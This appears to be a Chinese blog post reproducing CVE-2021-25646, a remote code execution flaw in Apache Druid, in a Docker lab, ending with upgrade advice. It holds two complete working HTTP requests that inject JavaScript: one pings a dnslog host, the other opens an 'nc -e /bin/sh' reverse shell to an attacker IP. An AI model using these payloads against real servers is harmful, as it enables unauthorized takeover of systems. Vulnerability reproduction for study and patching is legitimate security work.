Apache Druid远程代码执行漏洞复现(CVE-2021-25646)

最新推荐文章于 2024-06-01 18:23:44 发布
最新推荐文章于 2024-06-01 18:23:44 发布
阅读量2.6k 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Zlirving_/article/details/113645908
版权

目录

漏洞描述

Apache Druid 是用Java编写的面向列的开源分布式数据存储,旨在快速获取大量事件数据,并在数据之上提供低延迟查询分布式的、支持实时多维 OLAP 分析的数据处理系统。它既支持高速的数据实时摄入处理,也支持实时且灵活的多维数据分析查询。因此 Druid 最常用的场景就是大数据背景下、灵活快速的多维 OLAP 分析。

另外,Druid 还有一个关键的特点:
它支持根据时间戳对数据进行预聚合摄入和聚合分析,因此也有用户经常在有时序数据处理分析的场景中用到它。Apache Druid 默认情况下缺乏授权认证,攻击者可以发送特制请求,利用Druid服务器上进程的特权执行任意代码(CVE-2021-25646)
 

漏洞原理

https://mp.weixin.qq.com/s/McAoLfyf_tgFIfGTAoRCiw
 

影响范围

影响版本:Apache Druid < 0.20.1
 

漏洞复现

环境搭建(docker)druid-0.20.0

wget https://github.com/apache/druid/archive/druid-0.20.0.zip
unzip druid-0.20.0.zip
cd druid-0.20.0/distribution/docker
docker-compose up -d

在这里插入图片描述
访问8888端口:
在这里插入图片描述
点击Load data -> Local disk
在这里插入图片描述
依次填入
Base directory:
quickstart/tutorial/
File filter:
wikiticker-2015-09-12-sampled.json.gz
在这里插入图片描述
默认next,开启代理,抓包修改filter

漏洞验证(dnslog)
POST /druid/indexer/v1/sampler HTTP/1.1
Host: 192.168.191.128:8888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/json
Content-Length: 998
Connection: close

{"type": "index", "spec": {"ioConfig": {"type": "index", "inputSource": {"type": "inline", "data": "{\"isRobot\":true,\"channel\":\"#x\",\"timestamp\":\"2021-2-1T14:12:24.050Z\",\"flags\":\"x\",\"isUnpatrolled\":false,\"page\":\"1\",\"diffUrl\":\"https://xxx.com\",\"added\":1,\"comment\":\"Botskapande Indonesien omdirigering\",\"commentLength\":35,\"isNew\":true,\"isMinor\":false,\"delta\":31,\"isAnonymous\":true,\"user\":\"Lsjbot\",\"deltaBucket\":0,\"deleted\":0,\"namespace\":\"Main\"}"}, "inputFormat": {"type": "json", "keepNullColumns": true}}, "dataSchema": {"dataSource": "sample", "timestampSpec": {"column": "timestamp", "format": "iso"}, "dimensionsSpec": {}, "transformSpec": {"transforms": [], "filter": {"type": "javascript", "dimension": "added", "function": "function(value) {java.lang.Runtime.getRuntime().exec('ping -c 4 xxxx.dnslog.cn')}", "": {"enabled": true}}}}, "type": "index", "tuningConfig": {"type": "index"}}, "samplerConfig": {"numRows": 500, "timeoutMs": 15000}}

在这里插入图片描述

漏洞利用(反弹shell)

由于是docker环境,没有bash,可以利用sh
发现有里面有nc,亦可使用nc -e反弹
在这里插入图片描述

POST /druid/indexer/v1/sampler HTTP/1.1
Host: 192.168.191.128:8888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/json
Content-Length: 1006
Connection: close

{"type": "index", "spec": {"ioConfig": {"type": "index", "inputSource": {"type": "inline", "data": "{\"isRobot\":true,\"channel\":\"#x\",\"timestamp\":\"2021-2-1T14:12:24.050Z\",\"flags\":\"x\",\"isUnpatrolled\":false,\"page\":\"1\",\"diffUrl\":\"https://xxx.com\",\"added\":1,\"comment\":\"Botskapande Indonesien omdirigering\",\"commentLength\":35,\"isNew\":true,\"isMinor\":false,\"delta\":31,\"isAnonymous\":true,\"user\":\"Lsjbot\",\"deltaBucket\":0,\"deleted\":0,\"namespace\":\"Main\"}"}, "inputFormat": {"type": "json", "keepNullColumns": true}}, "dataSchema": {"dataSource": "sample", "timestampSpec": {"column": "timestamp", "format": "iso"}, "dimensionsSpec": {}, "transformSpec": {"transforms": [], "filter": {"type": "javascript", "dimension": "added", "function": "function(value) {java.lang.Runtime.getRuntime().exec('nc 192.168.191.129 7777 -e /bin/sh')}", "": {"enabled": true}}}}, "type": "index", "tuningConfig": {"type": "index"}}, "samplerConfig": {"numRows": 500, "timeoutMs": 15000}}

在这里插入图片描述

修复建议

建议广大用户及时更新Apache Druid,下载链接为:
https://druid.apache.org/downloads.htmlhttps://github.com/apache/druid/releases/tag/druid-0.20.1
 
GOT IT!

 
******************************************************
小实验小结,具体测试利用方式需根据具体实践场景~

想冲大厂的癞蛤蟆
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
漏洞挖掘】——90、Druid未授权访问漏洞
Fly_鹏程万里
06-14 186
Druid是一款前端界面非常友好的数据库连接池,它可以实监控数据源、连接池、SQL执行情况等,由于Druid的设置里面带有后台管理页面,而该页面默认是不需要登录即可访问从而造成了未授权访问的漏洞,对于该漏洞,攻击者可以通过该页面直接操作数据库,甚至可以获取权限进而控制整个数据库。
Apache Druid 远程代码执行漏洞CVE-2021-25646)
Lsec的博客
03-13 881
漏洞概述 Apache Druid 是用Java编写的面向列的开源分布式数据存储,旨在快速获取大量事件数据,并在数据之上提供低延迟查询。 Apache Druid 默认情况下缺乏授权认证,攻击者可以发送特制请求,利用Druid服务器上进程的特权执行任意代码。 影响版本 Apache Druid < 0.20.1 环境搭建 docker pull fokkodriesprong/docker-druid docker run --rm -i -p 8888:8888 fokkodriespr
druid未授权命令执行漏洞(CVE-2021-25646)
最新发布
尘玥的故事
06-01 594
由于Apache Druid 默认情况下缺乏授权认证,攻击者可直接构造恶意请求执行任意代码,控制服务器。druid未授权命令执行漏洞(CVE-2021-25646)
Apache Druid远程代码执行漏洞(CVE-2021-25646)
weixin_44047654的博客
12-05 1783
Apache Druid远程代码执行漏洞(CVE-2021-25646)
Apache Druid远程代码执行漏洞CVE-2021-25646)
chaojixiaojingang
03-15 9624
1.漏洞描述 Apache Druid 是一个集时间序列数据库、数据仓库和全文检索系统特点于一体的分析性数据平台。Apache Druid 包括执行用户提供的 JavaScript 的功能嵌入在各种类型请求中的代码。此功能在用于高信任度环境中,默认已被禁用。但是,在Druid 0.20.0及更低版本中,经过身份验证的用户可以构造传入的json串来控制一些敏感的参数发送恶意请求,利用Apache Druid漏洞可以执行任意代码。 2.影响版本 Apache Druid < 0.20...
Apache Druid 代码执行CVE-2021-25646)漏洞
YJ_12340的博客
05-31 456
Apache Druid是一个高性能的实时分析型数据库,旨在对大型数据集进行快速查询分析。Druid最常被当做数据库来用以支持实时摄取、高性能查询和高稳定运行的应用场景,同时,Druid也通常被用来助力分析型应用的图形化界面,或者当做需要快速聚合的高并发后端API,Druid最适合应用于面向事件类型的数据。主要应用于:点击流分析、网络监测分析、服务指标存储、供应链分析、应用性能指标分析、数字广告分析、商务智能 / OLAP。
Apache Druid 代码执行漏洞CVE-2021-25646)
shierbai的博客
05-22 1238
Apache Druid是一个开源的分布式数据存储。Apache Druid包括执行嵌入在各种类型请求中的用户提供的JavaScript代码的能力。这个功能是为了在可信环境下使用,并且默认是禁用的。然而,在Druid 0.20.0及以前的版本中,攻击者可以通过发送一个恶意请求使Druid用内置引擎执行任意JavaScript代码,而不管服务器配置如何,这将导致代码和命令执行漏洞
Apache Druid 远程代码执行漏洞(CVE-2021-26919)
RAFANra的博客
03-30 1345
Apache Druid 远程代码执行漏洞(CVE-2021-26919) 漏洞名称 : Apache Druid 远程代码执行漏洞(CVE-2021-26919) 组件名称 : Apache Druid 影响范围 : Apache Druid <0.20.2 漏洞类型 : 远程代码执行 利用条件 : 1、用户认证:不需要用户认证 2、触发方式:远程 造成后果 : 允许未经身份验证的攻击者执行任意代码。 2021年3月30日,深信服安全团队监测到一则组件存在 Apache Druid远程代码执行漏洞
CVE-2021-25646:Apache Druid远程代码执行漏洞
就是法老
08-24 2215
一:漏洞描述 阿里云安全向Apache官方报告了Apache Druid远程代码执行漏洞,分配CVE编号为CVE-2021-25646 Apache Druid 包括执行用户提供的 JavaScript 的功能嵌入在各种类型请求中的代码。此功能在用于高信任度环境中,默认已被禁用。但是,在 Druid 0.20.0 及更低版本中,经过身份验证的用户可以构造传入的json串来控制一些敏感的参数发送恶意请求,利用 Apache Druid 漏洞可以执行任意代码。 影响范围:Apache Druid &l
漏洞Apache Druid 远程代码执行 CVE-2021-25646
Adminxe的博客
02-03 452
0x00 前言 这个漏洞的根本问题是一个druid中全局性的问题,开发者在使用Jackson相关的标签时,出疏漏,使得攻击者可以构造传入的json串来控制一些敏感的参数。 阿里云安全@Litch1向Apache官方报告了Apache Druid远程代码执行漏洞 当时 漏洞 已知,处于某些原因,提取的poc也没进行公布,今天醒来,看到很多公众号发 ,也就总结一下,集各家所长,写一个的文章。 Apache Druid 是用Java编写的面向列的开源分布式数据存储,旨在快速获取大量事件数据...
CVE-2021-25646-Apache Druid漏洞POC.py
02-26
CVE-2021-25646-Apache Druid漏洞POC.py
【技术分享】CVE-2021-25646 Apache Druid 远程代码执行漏洞分析 .pdf
09-05
Apache Druid CVE-2021-25646 远程代码执行漏洞深度解析》 Apache Druid,作为一个高性能、列式存储的开源分布式数据存储系统,广泛应用于商业智能和OLAP(在线分析处理)场景,以处理大量实时和历史数据。然而,...
CVE-2021-22986 F5 BIG-IP-IQ 远程代码执行.md
04-23
CVE-2021-22986 F5 BIG-IP-IQ 远程代码执行
Apache Druid远程代码执行漏洞响应通告
05-05
Apache Druid远程代码执行漏洞响应通告
Drupal远程代码执行(CVE-2018-7602)与其Poc分析
Zlirving_的博客
06-24 1845
漏洞概述 这个漏洞CVE-2018-7600的绕过利用,两个漏洞原理是一样的。攻击者可以通过不同方式利用该漏洞远程执行代码CVE-2018-7602这个漏洞CVE-2018-7600的另一个利用点,只是入口方式不一样。所以,一旦参数可控并且没有经过正确的过滤,就很有可能出问题。   漏洞影响 ①对URL中的#进行编码两次,绕过sanitize()函数过滤 ②任意命令执行 ③… 影响版本 Drupal 7.x,8.x 修版本 Drupal 7.59,Drupal 8.5.3,Drupal 8
Apache文件解析漏洞(\x0A,.htaccess,多后缀)
Zlirving_的博客
07-31 1468
一、HTTPD 换行解析 (CVE-2017-15715) Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。 利用 上传一个名为1.php的文件,被拦截: 在1.php后面插入一个\x0A(也可在php后面写入%0A,对%0A做一个URL编码,也就是URL-decode)不再拦截: 访问刚才上传的/1.php%0a,发能够
Apache Solr文件读取漏洞与POC脚本编写
Zlirving_的博客
04-15 1427
0x00 漏洞概述 Apache Solr 全版本存在任意文件读取漏洞,攻击者可以在未授权的情况下获取目标系统的敏感文件。 0x01 影响版本 全版本(ALL) 0x02 漏洞 这里使用docker进行安装 docker pull solr docker run --name solr2 -d -p 8081:8983 solr 进入容器 cd /opt/solr-8.8.1/server/solr/config/configsets/_default cp -r conf /var/solr/da
druid-spring-boot-3-starter
08-31
druid-spring-boot-starter是一个用于在Spring Boot项目中集成Druid数据库连接池的依赖项。它是一个方便的解决方案,提供了一套完整的支持Spring Boot的配置和功能。通过引入这个依赖项,您可以方便地配置和管理...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值